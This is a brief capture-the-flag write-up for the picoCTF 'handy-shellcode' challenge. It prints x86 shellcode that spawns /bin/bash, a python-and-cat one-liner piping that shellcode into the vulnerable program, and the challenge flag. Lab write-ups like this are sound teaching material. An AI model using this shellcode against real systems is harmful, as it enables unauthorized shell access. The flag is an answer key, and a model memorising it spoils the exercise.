

handy-shellcode

Challenge

This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/handy-shellcode_6_f0b84e12a8162d64291fd16755d233eb on the shell server. Source.

Solution

Looks like we need to just pipe in shellcode on the shell server, so I'm grabbing some shell code for just /bin/bash.

I grabbed it from shell-storm.

"\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80"

I used python to output the byte code and cat to keep my standard in, then piped it into vuln.

(python -c "print('\x6a\x0b\x58\x99\x52\x66\x68\x2d\x70\x89\xe1\x52\x6a\x68\x68\x2f\x62\x61\x73\x68\x2f\x62\x69\x6e\x89\xe3\x52\x51\x53\x89\xe1\xcd\x80')" ;cat )| ./vuln

picoCTF{h4ndY_d4ndY_sh311c0d3_15d47ccd}